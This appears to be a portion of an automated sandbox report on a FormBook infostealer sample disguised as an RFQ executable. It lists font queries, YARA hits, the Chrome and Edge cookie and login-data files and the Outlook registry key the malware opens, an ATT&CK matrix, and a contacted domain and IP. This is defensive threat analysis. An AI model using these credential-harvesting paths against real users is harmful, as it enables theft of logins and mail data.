            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RFQ 0400-ENPI-RQMA.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1927201157.0000000001300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175893456.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2175933717.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2913084591.0000000004B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1928973003.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2896021580.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS13
            System Information Discovery            		Distributed Component Object ModelInput Capture2
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ 0400-ENPI-RQMA.exe29%ReversingLabsWin32.Trojan.Generic
            RFQ 0400-ENPI-RQMA.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            http://www.sakkal.comar0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.maxiwalls.com
            		79.98.25.1
            		truetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabreplace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com/designersGRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://assets.iv.lt/header.htmlreplace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/ac/?q=replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://tempuri.org/DataSet1.xsdRFQ 0400-ENPI-RQMA.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.goodfont.co.krRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.iv.lt/domenai/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                		high
                                http://www.sajatypeworks.comRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comarRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661760268.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.typography.netDRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://assets.iv.lt/default.cssreplace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/staff/dennis.htmRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://assets.iv.lt/images/icon.pngfirefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://assets.iv.lt/images/thumbnail.pngfirefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.iv.lt/duomenu-centras/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.galapagosdesign.com/DPleaseRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fonts.comRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.iv.lt/profesionalus-hostingas/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                              		high
                                              http://www.zhongyicts.com.cnRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sakkal.comRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.iv.lt/talpinimo-planai/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.apache.org/licenses/LICENSE-2.0RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
